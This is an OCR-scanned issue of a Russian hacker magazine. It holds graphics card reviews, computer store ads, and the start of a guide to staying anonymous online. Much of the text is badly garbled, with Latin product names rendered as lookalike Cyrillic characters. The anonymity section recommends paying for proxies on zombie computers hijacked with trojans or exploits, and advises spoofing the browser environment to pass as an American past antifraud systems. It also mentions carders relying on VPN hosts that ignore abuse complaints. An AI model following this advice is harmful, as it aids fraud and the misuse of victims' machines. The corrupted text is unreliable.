Поддержка РігесІХ 9.0с, ОрепРЬ 1.5 



Открывая коробку, мы можем сразу заметить не- 
обычное и нестандартное решение для системы 
охлаждения. Кулер от 2аІтап, установленный на 
^ чипе, является одним из самых бесшумных в тес- 
(Ч те и имеет приятный цвет и дизайн. На задней 
стороне платы находятся четыре дополнительных 
радиатора. Внутри коробки находится комплект 
поставки, до боли знакомый по другим продуктам 
от ЗаррМге. В набор юзера включены 6 дисков, 
среди которых игры Ргіпсе оі Регзіа: Запсіз оі Тіте 
и Зрііпіег СеІІ: Рапсіогга Тотоггоѵѵ, а также диски 
с драйверами, плюс документация и комплект из 
пяти необходимых проводов. Текстолит карты си- 
него цвета, как и сам кулер, что необычно для 
контроллеров от ЗаррМге. По производительности 
карта имеет средний результат, так что ее легко 
можно посоветовать ценителям категории «Це- 
на/Качество». Из минусов карты отметим доволь- 
но низкую производительность и отсутствие под- 
держки системы СгоззРіге. 



АЗІІ8 Ехігете 
Ы7800СТХ ТОР 

Графический процессор: ІЧѴІРІА ОеРогсе 78000ТХ 

Частота процессора: 486 МГц, 

Видеопамять: 256 Мб РРВЗ, 1350 МГц, 256 бит 

Частота ВАМ РАС: 400 МГц 

Интерфейс: АОР или РСІ-Е 

Разъемы ТѴ-оЫ, 2хРѴІ 

Возможность РиаІ-установки: Да 

Поддержка РігесІХ 9.0с, ОрепРЬ 2.0 



Этот видеоконтроллер от АЗІІЗ претендует на зва- 
ние самого производительного в сегодняшнем тесте. 
Огромное количество аддонов к карте не может не 
радовать. Помимо бонуса из игр (а это пять дисков) 
мы имеем еще три — с дровами и дополнительными 
программами. Яркий буклет по установке изобилует 
цветными картинками, плюс ко всему адаптеры 
ОѴІ/О-ЗІІВ, РЮТѴ и переходник доппитания. РІельзя 
не упомянуть симпатичный мягкий кейс под СО в 
комплекте. Карточка является массивным, широким 
и тяжелым устройством за счет установки системы 
охлаждения от Агсііс Сооііпд. Карта занимает два 
РСІ-Ехргезз слота из-за объемной системы охлажде- 
ния, а использование АЗІІЗ Ехігете ІМ7800ѲТХ ТОР 
в режиме ЗІ_І возможно только на материнках АЗІІЗ, 
потому что разъемы РСІ-Е на таких мамках располо- 
жены дальше друг от друга, поэтому не будет проб- 
лем с установкой таких крупногабаритных карт. Со- 
ответственно, не забудь БП Ватт так на 500, дающий 
ток в 34 Ампера по 1 2В линии для ЗІ_І (не менее 400). 



М8І ОеРогсе 
ЫХ6800 II 11га 

Графический процессор: КІѴЮІА ОеРогсе 78000ТХ 

(NN/40) 

Частота процессора: 400 МГц 

Видеопамять: 256 Мб РРВ, 1100 МГц, 256 бит 

Частота ВАМ РАС: 400 МГц 

Интерфейс: АОР или РСІ-Е 

Разъемы ТѴ-оиі, 2хРѴІ 

Возможность РиаІ-установки: Да 

Поддержка РігесІХ 9.0с, ОрепРЬ 1.5 



Еще один агрегат от тайваньской Місгозіаг. На упа- 
ковке — злобная морда в шлеме, скриншоты из иг- 
рушек. Сама карта выглядит очень внушительно и 
красиво. Как положено для видеоакселераторов та- 
кого типа, прилагается серьезная система охлажде- 
ния. Довольно сильный прорыв обеспечивается за 
счет встроенного в чип графического движка Сіпе 
РХ 3.0, а также технологий ІЛІгазМасІоѵѵ II для обра- 
ботки теней, что очень действенно в современных 
игрушках. В комплекте просто куча всяческих дис- 
ков с дровами, играми и полезными программами. 
Присутствуют также все необходимые переходники 
и шнуры. Интересен тот факт, что питания через 
порт устройству будет недостаточно. На нем есть 
разъем обычной формы для подпитки непосред- 
ственно от БП. Ускоритель показал хорошие резуль- 
таты, однако он не конкурент монстрам на движках 
типа 78000ТХ. Из минусов опять же отмечаем тре- 
бования к блоку питания не менее 480 Ватт. 




АОреп Аеоіиз 
7800СТХ-0Ѵ0256 

Графический процессор: ЫѴЮІА ОеРогсе 78000ТХ (070) 

Частота проціссбра: 1 х430 МГц ' /_ _ІГ_ У ‘ 

Видеопамять: 256 Мб РРВЗ, 1200 МГц, 256 бит 

Частота ВАМ РАС: 400 МГц 

Интерфейс: РСІ-Е 

Разъемы ТѴ-оиі, 2хРѴІ, ѴІѴО, НРТѴ 

Возможность РиаІ-установки: Да 

Поддержка РігесіХ 9.0с, ОрепѲЬ 2.0 



Данный графический контроллер от компании АОреп был выпущен на базе про- 
цессора пѴісІіа ОеРогсе 78000ТХ, обладает 256 Мб памяти СЮОВЗ с 256-битной 
шиной, оборудован двумя видеоинтерфейсами ЭѴІ для подключения цифровых 
панелей и ТВ-выходом З-Ѵісіео с поддержкой телевидения высокой четкости 
РЮТѴ. Имеется также поддержка ЗЫ-интерфейса. У данной карты очень симпа- 
л тичный дизайн, выполненный в бело-красно-черных тонах. В комплектации имеют- 
ю ся и переходники ОѴІЮ-ЗиЬ для мониторов с аналоговыми выходами, а также диск 
— с драйверами и сопутствующим программным обеспечением. Ріашелся также 
" и диск с игрой ЗесопсІ ЗідРіІ. Имеется поддержка технологий: ІпіеШЗатрІе 4.0, Сіпе 
^ РХ 4.0, ІІІігаЗНасІоѵѵ II и РигеѴісІео. Согласись, комплектация прихрамывает, осо- 
ш бенно для устройства с такой ценой. Но производительность, конечно, не может не 
< радовать. Карточка очень хорошо подходит для игр, однако для разгона стоит по- 
дыскать что-то получше. 








АІѴЮ АІЫоп™ 64 Х2 

^ "чрир— 





Двухъядерные процессоры АМй АІЫоп™ 64 Х2 — это 
возможность одновременной работы с несколькими 
ресурсоёмкими приложениями; защита системы от 
компьютерных вирусов на уровне платформы; 
уменьшенный уровень энергопотребления и шума; 
высокая скорость обмена данными с оперативной 
памятью и устройствами ввода/вывода. 



К 

ге&к 



Для работы с двухъядерным процессором АІѴЮ АІЫоп™ 64 Х2 
вашему компьютеру не потребуется адаптация 
программного обеспечения. 



Россия, 119121, Москва, ул. Плющиха, дом 42, тел.: (095) 710-72-80 

г-апсі-к.сот 
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СідаЬуіе 
СѴ-ЗЕ 1 -68СТ 

Г рафический процессор: ІЧѴІРІА ѲеРогсе 6800ѲТ (NN/45 ОТ) 

Частота процессора: 370 МГц 

Видеопамять: 512 Мб ОРРВЗ, 1000 МГц, 256 бит 

Частота ВАМ РАС: 370 МГц 

Интерфейс: РСІ-Е 

Разъемы 5/АѴ, 2хРѴІ-І 

Возможность Риаі-установки: Да 

Поддержка РігесІХ 9.0с, ОрепѲІ- 1.5 



Это устройство ты полюбишь сразу. Не только за 
его шикарный дизайн, добротную начинку из ад- 
донов и дополнительных фишек в коробке, но за 
удивительное решение в плане производитель- 
ности. Представь себе два чипа ѲеРогсе 6800 ѲТ, 
установленные на одну плату при поддержке 512 
Мб ѲОВЗ памяти! То есть у пользователя есть воз- 
можность использовать одну карту либо в ЗІ_І ре- 
жиме как две карты, либо в обычном режиме как 
одну. Это избавляет юзера от необходимости до- 
купать второй такой графический контроллер. 
Есть также поддержка сразу четырех(!) монито- 
ров и дополнительный адаптер на два аналоговых 
монитора. Их можно с помощью переходников до- 
полнить до цифровых. Есть и минусы. Во-первых, 
это сильно кусающаяся цена, да и в случае уста- 
ревания карты нет смысла докупать вторую; во- 
вторых, агрегат сильно греется и заметно шумит, 
да и производительность явно недотягивает до то- 
повых моделей почти за ту же цену. 



барГііге 
АТІ НАОЕОЫ 
XI 800 XI. 

Графический процессор: ВАРЕОМ XI 800 ХІ_ 

Частота процессора: 480 - 500 МГ ц 

Видеопамять: 256 Мб РРВЗ, 1300 МГц, 256 бит 

Частота ВАМРАС: 500 МГц 

Интерфейс: РСІ-Е 

Разъемы РиаІ ѴѲА, 2хРѴІ 

Возможность Риаі-установки: Да 

Поддержка РігесІХ 9.0с, ОрепѲІ- 2.0 



Один из самых мощных агрегатов в сегодняшнем 
тесте. Этого аппарата, возможно, даже к выходу 
статьи еще не будет на прилавках магазинов, но мы 
с тобой уже сейчас узнаем чего он стоит — это раз. 
И стоит ли он своих бешеных денег — это два. 
Белая коробка по размерам не больше своих соб- 
ратьев от ЗаррЫге со стандартным АІіеп'ом на об- 
ложке вмещает в себе все тот же обычный набор. 
Три переходника, несколько дисков, ѴѴіпЭѵсІ. Футу- 
ристический кулер радует глаз. Неплохо, конечно, 
однако когда обычный компьютерный пролетарий 
сможет вкусить плоды разработки компаний АТІ и 
ЗаррЫге? Да, видимо, не скоро. Мало того, что она 
еще не появилась в продаже, так и цена заоблачная. 
Тем не менее, можем порекомендовать данную ви- 
деокарту пользователям, не жалеющим зелени для 
своего «жлезного коня», то есть тем, кто предпочи- 
тает отдать за производительность любые деньги. 



барИіге 
АТІ КАОЕОИ 
Х850ХТ 

Г рафический процессор: МѴІРІА ѲеРогсе 7800ѲТХ (NN/40) 

Частота процессора: 325 МГц 

Видеопамять: 256 Мб РРВ, 700 МГ ц, 256 бит 

Частота ВАМРАС: 325 МГц 

Интерфейс: АѲР или РСІ-Е 

Разъемы ТѴ-оиІ, 2хРѴІ 

Возможность Риаі-установки: Да 

Поддержка РігесІХ 9.0с, ОрепѲІ- 2.0 



ЗарЫге АТІ ВАЭЕОІМ Х850 ХТ является одной из са- 
мых-самых карточек на базе чипа Васіеоп Х850ХТ. 
Ведь это графический контроллер, выполненный на 
традиционном для ЗаррГііге текстолите красного цвета 
с 256-битной шиной доступа к памяти, поддерживаю- 
щей до 256 мегабайт ОЭЭВЗ и 1 6 пиксельных конвейе- 
ров. Заметим, что частоты для ядра 540 МГц и 1180 
МГц для памяти бЭЭВЗ. Хотя от предыдущих продук- 
тов, таких как АТІ Васіеоп х800ХТ и АТІ Васіеоп х800ХІ_ 
(которые, между прочим, считались самыми быстрыми 
до недавнего времени) данная карта отличается сов- 
сем небольшим приростом по производительности. 
Платой за него стала новейшая «выхлопная» система 
охлаждения, установленная на ЗарГііге АТІ ВАѲЕОІЧ 
Х850 ХТ. О ней стоит рассказать поподробнее. Дело в 
том, что пластиковый корпус, «надетый» на систему 
«радиатор + вентилятор», позволяет выбрасывать го- 
рячие слои воздуха вне корпуса ПК, что облегчает ра- 
боту кулера. Отрицательным фактом, конечно, являет- 
ся шум. Из-за пластикового корпуса карта дает ощути- 
мые вибрации. Комплектация бедновата. 




МНОГИМ ИЗ ВАС ЕЩЕ ДОЛГО НЕ СВЕТИТ ДЕРЖАТЬ В РУКАХ И РАДОВАТЬ- 
СЯ НА ЭТИХ ЧУДО-МОЛОДЦОВ И ГИГАНТОВ ПРОИЗВОДИТЕЛЬНОСТИ. ОД- 
НАКО НА ТО ОН И ПРОГРЕСС, ЧТОБЫ БЫЛО КУДА СТРЕМИТЬСЯ. РЕЗУЛЬ- 
ТАТЫ У НАС СЛЕДУЮЩИЕ: МЗІ ЫХ7800 ОТХ И ЗАРНІВЕ АТІ ВАОЕОЫ XI 800 ХІ_ 
— ЛУЧШИЕ РЕБЯТА, ПОРАДОВАВШИЕ РЕЗУЛЬТАТАМИ, А ВОТ, НАПРИМЕР 
МЗІ 14X6800, — АУТСАЙДЕР НАШЕГО ТЕСТА. МЗІ 14X7800 ОТХ ПОЛУЧАЕТ ОТ 
НАС ПРЕМИЮ «ВЫБОР РЕДАКЦИИ» ЗА ПРЕКРАСНОЕ ВЫПОЛНЕНИЕ ПОС- 
ТАВЛЕННЫХ ЗАДАЧ. «ЛУЧШАЯ ПОКУПКА» СЕГОДНЯ — ЭТО АЗІІЗ ЕХТВЕМЕ 
N7800 ОТ. ОТЛИЧНЫЙ РЕЗУЛЬТАТ В КУПЕ С ЦЕНОЙ СДЕЛАЛ СВОЕ ДЕЛО. 



Частота ВАМРАС: 325 МГц 



Интерфейс: АОР или РСІ-Е 
Разъемы ТѴ-оиІ, 2хРѴІ 



Возможность Риаі-установки: Да 
Поддержка РігесІХ 9.0с, ОрепѲІ- 1.5 



Рассматривая коробку и ее содержимое, долго не можешь понять в чем от- 
личия данного ускорителя от версии Шга. Дизайн упаковки, комплектация, 
даже внешний вид карточки практически такой же, как у ее усовершенство- 
ванного собрата. Однако разница между ними довольно очевидна — это про- 
изводительность. Отличия в производительности и в результатах тестирова- 
ния объясняются параметрами карты. Во-первых, данное устройство поддер- 
живает старый тип памяти, а во-вторых, у нее всего двенадцать пиксельных 
конвейеров против шестнадцати у МЗІ ѲеРогсе ЫХ6800 Шга. Конечно, часто- 
ты ядра похуже. Если у ѲеРогсе 6800 частота — 325МГц/700МГц, то у 
ѲеРогсе 6800 Шга — 400МГЦ/1 1 00МГ ц. Существует еще вариант со средни- 
ми параметрами, но об этом ниже. Конечно, упрощенная модель дешевле. 
Не забудем о технологии охлаждения МЗІ Соррег ШТВА, которая присут- 
ствует на всех агрегатах МЗІ ЫХ6800, и подразумевает использование пол- 
ностью медных радиатора и вентилятора. Такое решение обеспечивает 
очень низкий шумовой порог. Но на высоких частотах заметен легкий шум. 



М8І СеРогсе ЫХ6800 

Графический процессор: МѴІРІА ѲеРогсе 7800ѲТХ (NN/40) 

Частота процессора: 325 МГц 

Видеопамять: 256 Мб РРВ, 700 МГц, 256 бит 



рпісо і!ѵ;.€2.!і : 










Мы делаем лучшее доступным! неоторг 

^ ^ сеть компьютерных магазинов I 




Торговая компания НбОТОрГ приглашает Вас посетить сеть компьютерных магазинов. 
Комфортабельные торговые залы, широкий ассортимент и профессиональная работа 
менеджеров превратят процесс выбора и покупки в удовольствие. Уважительное обслуживание 
и качественный сервис с каждым днем привлекают все большее количество клиентов в 
нашу сеть. Собственное сборочное производство и розничная сеть позволяют предлагать 
нашим клиентам минимальные цены. Строгий входной контроль и многоэтапное тестирование 
гарантируют безукоризненное качество мирового уровня. 




В кредит от $79 




В кредит от $135 



В кредит от $129 



№о РС® Сате Атаіеиг 3000 

АІѴЮ® АШІоп 64 3000+ Ргосѳббог 64ЬІ1 ТесГіпоІоду 
МісгобоГі;® ѴѴіпсіоѵѵб® ХР Ноте ЕсІіЬоп К 115 2005 
512МЬ ЭиаІ СГіаппеІ ЭЭК БЭРАМ 
120СЬ НагсІ Эгіѵе (7200грт) 5-АТА 
_256МЬ пѴІЭІА СеРогсе 66006Т РСІ-Х СгарЫсБ С агсі 
|24х СЭ Вигпег/ЭѴЭ СотЬо Эгіѵе 
■пГедгаГесІ 7.1 СЬаппеІ Аисііо 

• 17" ѴіеѵѵБопіс І_СЭ ТѴ 8т5 

• РІосІисйѵ'Лу Раск 
^Йавиатура ЬодЛесЬ 

• Оптическая мышь 




Рекомендуемый ІІрдгасІе 

• АМЭ® АТЫоп 64 3400+ Ргосѳббог 64Ы1: ТесЬпоІоду 

• ЭѴЭ+РѴѴ апсі СЭ-РѴѴ Эгіѵѳб 

• 512МЬ ЭиаІ СЬаппеІ ЭЭК БЭРАМ 



ІЧео РС® Сате БИооіег 3400 

• ІпТеІ® РепЬит® 4 Ргосѳббог 3400МН2 НТ ТесЬпоІоду 
ѵѵіГЬ ЮббМНг РгопГ Бісіе Вііб СасЬе 2048кЬ 

• МісгобоШ® ѴѴіпсіоѵѵб® ХР РгоГеББІопаІ К 115 

• 1<ЗЬ ЭиаІ СЬаппеІ ЭЭРІІ аГ 533МН2 

• 2506Ь Нагсі Эгіѵе (7200грт) 5-АТА 

• 256МВ пѴІЭІА СеРогсе 6800СТ РСІ-Х СгарЫсБ С агсі 

• ЭѴЭ+РѴѴ апсі СЭ-РѴѴ ЭгіѵеБ 

• ІпГедгаГесІ 9.1 СЬаппеІ Аисііо 

• 19" І_С ЬСЭТѴ 19505 8т5 

• РгосІисГіѵіГу Раск 

• Клавиатура ЬодіГесЬ ѴѴігеІеББ 

• Оптическая мышь 

• Гарантия 3 года 

Рекомендуемый ІІрдгасІе 

$ 75 • ІпТеІ® РепЬит® 4 Ргосѳббог 3800МН2 НТ ТесИпоІоду 

$ 40 • СгеаЛѵе АЭЭІСУ-2 25 РІаЛпит 7.1 

$ 45 • ІСЬ ЭиаІ СЬаппеІ ЭЭРІІ аі: 533МН2 



Риііізи-Біетепз® 3000 МНг 

• Іп(еІ® Репііит® 4 Ргосеззог 3000МН2 (1024КЬ / БЗЗМНі) 

• МісгобоГГ® ѴѴіпсіоѵѵб® ХР Ноте Есіііііоп РІІБ 

• МВ Р5С ІпТеІ СЬірБеІ: 

•512МЬ ЭиаІ СЬаппеІ ЭЭР 

• бОСЬТЭРВО (5400грт) НЭЭ ЭЭМА 

• 15,4" ѴѴХСА ТРТ дисплей 

• 128МЬ Расіеоп 9700 (МП) 128ЫГ ТѴ-оШ & ѴСА-оиГ 

• ЭѴЭ+РѴѴ 

• БоипсІ 5.1 

• Вес 3,0 кг 

• Гарантия 2 года 

• Сумка и мышь в комплекте 

• ѴѴі-РІ / ІР /1394 / 56К / І_АІ\1 10/100 / ЭБВ 2.0 / І_РТ 





Рекомендуемый ІІрдгасІе 




$ 185 


• ѴѴі-Рі «БГгеат» Коиіег 


$ 120 


$ 145 


• БІІт аііитіпіит НЭЭ 80СЬ 115В 2.0 


$ 120 


$ 90 


• Эоот III геіаіі КЫБ 


$ 59 




63 - 38-25 

Единая справочная служба 
Заказ по телефону 




101 - 30-23 

Корпоративный отдел 
Персональный менеджер 




ѵѵѵѵѵѵ.пеозНор.ги 

Интернет-магазин 
Уникальный сервис 



м «Беляево», Миклухо-Маклая, ул., д.37, ТЦ «Меркадо» 105-52-58 

м «Бульвар Адм. Ушакова», Веневская ул., ТЦ «Южное Бутово» 363-38-25 

м «Варшавская», Варшавское шоссе, д.82 363-38-25 

м «Водный стадион». Кронштадтский бульвар, д.7, ТЦ «Крона» 786-22-26 

м «Дмитровская», Бутырская ул., д.97 737-59-37 

м «Добрынинская», Люсиновская ул., д.7 237-05-57 

м «Коломенская», Судостроительная ул., д.1 115-00-16 

м «Комсомольская», Универмаг «Московский», 4 эт. 916-57-24 

м «Ленинский пр-т». Ленинский пр-т, Д.37А 974-87-68 

м «Марьино», Люблинская ул., Д.102А, ТЦ «Марьинский пассаж» 580-73-15 

м «Медведково», Широкая ул., д.9, к.1, ТЦ «Меркадо» 656-93-73 



м «Петровско-Разумовская», ТК «Электромаркет» 363-38-25 

м «Пражская», Кировоградская ул., д.15, ТЦ «Электронный Рай» 389-66-27 

м «Пролетарская», 3-й Крутицкий пер., д.15 676-33-71 

м «Пр-т Вернадского», пр-т Вернадского, д.39 933-43-40 

м «Савёловская», Сущевский вал, д.5, стр.22 363-38-25 

м «Сокол», Волоколамское шоссе, д.1, к.1 158-06-33 

м «Сходненская», Яна Райниса бульвар, д.2, к.1 363-38-25 

м «Чертановская», Чертановская ул., стр.2, ТЦ «Каспий» 105-81-12 

м «Шоссе Энтузиастов», пр-т Буденного, д.53, ТЦ «Буденовский» 788-07-41 

м «Щелковская», Уральская ул., вл.1, ТЦ «Русское бистро» 786-96-45 

м «Электрозаводская», Б. Семеновская ул., д.Ю 962-17-07 
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КАК ВСЕГДА ОСТАВАТЬСЯ АНОНИМНЫМ? КАК 
БЕЗОПАСНО ПЕРЕДАВАТЬ ДАННЫЕ ПО СЕТИ? 

КАК ОБЕЗОПАСИТЬ СЕБЯ ОТ СНИФЕРА? СЕГОД- 
НЯ МЫ РЕШИЛИ ОТВЕТИТЬ НА ВСЕ НАКОПИВ- 
ШИЕСЯ ВОПРОСЫ И ПОСТАВИТЬ, НАКОНЕЦ, 

ВСЕ ТОЧКИ НАД I. ПРИСТЕГНИСЬ, ТЫ ДЕРЖИШЬ 
В РУКАХ САМЫЙ ПОЛНЫЙ ГИД ПО БЕЗОПАС- 
НОСТИ I Степан Ильин ака Зіер (зІер@геаІ.хакер.ш) 

8 шагов на пути 
к полной безопасности 
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1 [прокси и сокс-серверы] Спроси любого горе-хакера, каким 

образом он остается анонимным, и он уверенно ответит тебе: 
«С помощью прокси-сервера, естественно». Метод действитель- 
но проверенный, но для того, чтобы успешно использовать его, 
недостаточно просто прописать прокси в браузер. Первое, что нужно уяснить 
— прокси и соке бывают разные. Едва ли опытный хакер стал использовать те 
прокси-листы, которые свободно распространяются в Сети. Тем более, для ка- 
кого-то серьезного дела. Кто там недовольно спросил: «А почему бы и нет?». 
Подумай сам: где гарантия, что на сервере не ведутся логи? Может быть, хозя- 
ин прокси-сервера вообще спецагент камерунских спецслужб, который еще и 
хорошо знает дядю Мишу из соседнего с тобой отдела «К». Как тебе такой до- 
вод? Если уж собрался воспользоваться прокси, то не поленись купить доступ 
к специализированному сервису. В этом случае большинство из проксиков ус- 
тановлены на обыкновенных компьютерах-зомби (посредством троянов или 
эксплойтов к ІЕ, например), а их хозяева даже не подозревают о подлянке и, 
само собой, не ведут логов. Такие компьютеры в огромных количествах разб- 
росаны по всему миру, поэтому ты всегда сможешь найти прокси из той стра- 
ны (или даже города/штата), которая тебе необходима. 

Если же дело не особенно серьезное, то доступ к таким сервисам, в принципе, 
необязателен. В таких случаях можно положиться на обычные прокси, списки 
которых свободно распространяются через инет. Найти их несложно, но рабо- 
та с ними превратится в самую настоящую каторгу, если на вооружение ты не 
возьмешь пару полезных утилит. Для удобства поиска проксей рекомендую 
программу РгохуОгаЬ ( ргохудгаЬ.тзк.ш ). Достаточно раз забить в ее базу адре- 
са популярных ресурсов, содержащих прокси-листы (например, ил/іл/і /.ігеер- 
гоху.ги/сіоуѵпіоасі/іізіз/доосіргоху.іхі), и все готово. Тулза сама извлечет адреса 
проксей со всех ресурсов и грамотно оформит их в виде стандартного прокси- 
списка. Этот список, естественно, нужно самым тщательным образом прове- 
рить. С задачей на «отлично» справится ААТооІз (ѵѵѵѵѵѵ.дІоскзоП.сот) , которая 
владеет проверкой не только обычных прокси, но еще и носков. Запомни: ес- 
ли речь идет о НТТР-прокси, то после проверки внимательно смотри на два па- 
раметра: анонимность и поддержка ЗЗІ_. Уровень анонимность должен быть 
максимальным, так как только в этом случае удаленный сервер не заметит ис- 
пользование прокси. Поддержка ЗЗІ_ не менее критична, особенно если ты 
собрался мутить цепочки из прокси или работать с НТТРЗ-сайтами. Если такой 
поддержки у прокси не будет (даже из одной прокси в цепочке), ты сразу же 
засветишь себя. Комментарии излишни. 
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[виртуальная машина] Переменные окружения — очень под- 
лая технология. Каждый раз, когда ты заходишь на ту или иную 
страницу, твой компьютер передает название используемого 
браузера, тип и локализацию винды и т.п. Все это вряд ли помо- 
жет тебе представиться толстым америкосом из Штата Флорида. Любая ан- 
тифрод-система (апШгаисІ) тут же заметит подвох и занесет тебя в черный спи- 
сок. Конечно, можно установить на машину нужную локализацию винды (то 
есть английскую версию), затем грамотно обозначить часовой пояс и сделать 
прочие приготовления, но, согласись, все это очень непрактично. Придется 
постоянно перегружаться, устанавливать дополнительный софт — словом, не 
наш метод. Гораздо более удобно в этих целях использовать виртуальные ма- 
шины. Для экспериментов рекомендую ѴМѵѵаге ѴѴогкз!а!іоп, последние версии 
которой мы выкладывали на октябрьском 0\Ю. Установка гостевой операцион- 
ной системы осуществляется точно так же, как если бы устанавливал систему 
на свой жесткий диск. С той лишь разницей, что перед установкой нужно обоз- 
начить некоторые параметры будущей системы (Рііе -► ІМеѵѵ -► ѴИиаІ Масіііпе). 
Единственный шаг, который может вызвать затруднения, — Ыеіѵѵогк Туре. Мас- 
тер предлагает выбрать один из трех пунктов: 

ІІзе ЬгісІдесІ пеіѵѵогкіпд — виртуальная машина имеет полный доступ в локальную сеть, к ко- 
торой подключен основной компьютер. При этом у нее есть собственный ІР-адрес, поэтому 
она работает наравне со всеми остальными компьютерами в сети. 

ІІзе МАТ — гостевая ось спрятана за І\ІАТ-сервисом, организованным на основной машине. 
ІІзе ІіозТопІу пеіѵѵогкіпд — в этом случае будет использоваться виртуальная сеть с основным 
компьютером. Возможности доступа во внешнюю локальную сеть отсутствует. 

Эо по! изе пе!ѵѵогк — сеть использоваться не будет. 

Первый вариант наиболее предпочтителен. 
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3 [безопасный мес- 

седжер] ІСО — зло. 
Ей пользуется почти 
каждый, но вместе с 
тем гарантировать безопасность 
использования ІСО не может ник- 
то. Взять хотя бы протокол ІСО: он 
давно изучен и не поддерживает 
шифрование трафика, поэтому все 
сообщения легко перехватывают- 
ся сниферами (лучшим подтверж- 
дением моих слов является прога 
ІсцЗпі! — уѵуѵуѵ. иІазоіІ.сот/ісдзпіГ) . 
Помимо этого, имеют место угоны 
ІСО, чреватые тем, что от твоего 
имени кто-то легко сможет вести 
диалог и тем самым серьезно под- 
портить твою репутацию. Одним 
словом, хотелось бы иметь более 
безопасное средство, которое без 
опаски (по крайней мере, сравни- 
тельно) возможно было использо- 
вать для серьезных дел. Такое, 
как Зесиге ЗПиШе Тгапзрогі ( тш.зе - 
сигезШИе.сот). 

Это еще один месседжер вроде 
ІСО, Іпсіідо, АОІ_ и т.п., но есть не- 
которые особенности, которые 
сделают твое общение безопас- 
нее. Первое, что хочется отме- 
тить: ЗЗТ передает сообщения 
исключительно в зашифрованном 
виде. Используемые ВЗА-алго- 
ритмы работают так, что расшиф- 
ровать сообщение сможет твой 
собеседник и никто другой. Поми- 
мо этого, есть еще один нюанс: 
программа использует два типа 
соединения. Первое — соедине- 
ние с ЗЗТ-сервером — необходи- 
мо для идентификации в системе, 
поиска пользователей, а также 
передачи сообщений тем юзерам, 
которые находятся в оффлайн. 
Второй тип соединения — прямое 
с конкретным пользователем — 
устанавливается во время пере- 
дачи сообщений, файлов или го- 
лосовых мессаг. Таким образом, 
ни одна из твоих бесед не окажет- 
ся в логах на сервере, так как со- 
общения через него попросту не 
проходят. 

Другая особенность заключается 
в том, что угнать ЗЗТ-номер зна- 
чительно сложнее, чем в ІСО. Воз- 
можности восстановить пароль на 
аккаунте нет. Потерял или забыл 
— виноват сам. Но это еще цве- 
точки. Для работы в системе ты 
должен представить специальный 
файл-ключ, в котором зашифро- 
вана необходимая информация. 
Система очень похожа на ѴѴеЬ- 
гтіопеу: даже если ты знаешь па- 
роль, но у тебя нет ключа, подклю- 
читься к серверу ты не сможешь. 
Отмечу и то, что многие уже просек- 
ли прелести нового месседжера и ак- 
тивно заводят в нем пока еще 6-знач- 
ные номерки Теперь твоя очередь! 
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4 [ѴРІМ-сервер] Главная проблема 
использования прокси в том, что дан- 
ные передаются в открытом, то есть 
незашифрованном виде. Это в 
действительности очень серьезный недостаток, так 
как весь твой НТТР-трафик может быть легко перех- 
вачен обычным снифером даже в твоей собственной 
локалке. Что уж говорить о провайдере и обо всех 
остальных узлах, через которые проходят сетевые 
пакеты, прежде чем достигают пункта назначения. 
Большую уверенность в сохранности своих дан- 
ных может придать ѴРЫ-соединение. 
Аббревиатура ѴРЫ расшифровывается как вирту- 
альная частная сеть. Технологию в большинстве 
случаев используют для объединения нескольких 
локальных сетей (например, двух-трех офисов од- 
ной компании) или для подключения к локальной се- 
ти удаленных пользователей. Каналом связи в обо- 
их случаях выступает Интернет. Как оказалось, ѴРЫ 
идеально подходит для обеспечения анонимности и 
безопасности обычных пользователей. Фишка зак- 
лючается в том, что ѴРЫ РРТР-соединение обычно 
использует криптостойкое шифрование (вплоть до 
2048 бит), которое практически невозможно рас- 
шифровать «на лету». Чтобы лучше понять, как эта 
система работает, предлагаю по шагам рассмотреть 
процесс взаимодействия клиента и ѴРЫ-сервера. 
Внешне ѴРЫ-соединение мало чем отличается от 
подключения к обычной локальной сети: приложе- 
ния вообще не почувствуют разницы и поэтому 
без какой-либо настройки будут использовать его 
для доступа в инет. Когда одно из них захочет об- 
ратиться к удаленному ресурсу, на компьютере бу- 
дет создан специальный ОВЕ-пакет, который в за- 
шифрованном виде будет отправлен ѴРЫ-серве- 
ру. ѴРЫ-сервер, в свою очередь, этот пакет рас- 
шифрует, разберется в чем его суть (запрос на за- 
качку какой-либо НТТР-страницы, просто переда- 
ча данных и т.д.) и выполнит от своего лица (то 
есть засветит свой ІР) соответствующее действие. 
Далее, получив ответ от удаленного ресурса, ѴРЫ- 
сервер поместит его в ОВЕ-пакет, зашифрует и в 
таком виде отправит обратно клиенту. 
Непрерывное шифрование передаваемых дан- 
ных — это ключевой момент в обеспечении безо- 
пасности. Благодаря этой возможности ѴРЫ в 
последнее время на особом счету у любого толко- 
вого админа, хакера и кардера :). В большинстве 
случаев имеет место договоренность с админист- 
рацией, которая за определенную денежку обязу- 
ется игнорировать жалобы в аЬизе-службу и вес- 
ти все логи исключительно в/сіеѵ/пиіі. 

Наряду с ѴРЫ-сервером очень часто устанавливает- 
ся еще и ОрепѴРЫ (тж.орепѵрп.пеі). Он не только 
предоставляет некоторые дополнительные фишки 
по сравнению с РРТР, но еще и является единствен- 
ной возможностью использовать ѴРЫ-подобное сое- 
динение, если провайдер не пропускает ОВЕ-пакеты. 
Столь дурная привычка характерна для большинства 
сотовых операторов, которые почему-то режут все 
ОВЕ-пакеты, проходящие через ОРВ5 и ЕЭОЕ. 
Теперь главный вопрос: как получить доступ к ѴРЫ- 
серверу? Направо и налево ѴРЫ-аккаунты не раз- 
дают, поэтому, вероятнее всего, такой аккаунт тебе 
придется купить. Месяц обслуживания стоит при- 
мерно 30 — 40$, но цена вполне оправдана. В прин- 
ципе, никто не мешает поднять тебе собственный 
ѴРЫ-сервер, но для этого, как минимум, понадобит- 
ся некоторый опыт (читай архив X, так как у нас бы- 
ли статьи на эту тему), а также выделенный сервер, 
требующий существенных денежных вложений. 
Пошаговые инструкции по созданию ѴРЫ-подклю- 
чения обычно выложены на страницах сервиса, по- 
этому я намеренно не буду выкладывать их здесь. 
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5 [§§Н — альтернатива ѴРЫ] ѴРЫ — это надежно 
и удобно, но есть один минус. Отдавать 30 — 40$ в ме- 
сяц за услуги одного только ѴРЫ — очень накладно 
даже для более-менее обеспеченных пользователей. 
Да и какие гарантии, что ѴРЫ-сервис не курируют люди в форме? 
Словом, неплохо было бы найти дешевую альтернативу ѴРЫ, кото- 
рая вместе с тем не уступала бы в надежности и не требовала ис- 
пользования услуг третьих лиц. Искать, на самом деле, ничего не 
надо — такая альтернатива есть. Я говорю о 88Н-туннелировании. 
Все, что нужно для ее использования, — шелл или хостинг с под- 
держкой Ореп88Н, который довольно легко можно купить всего 
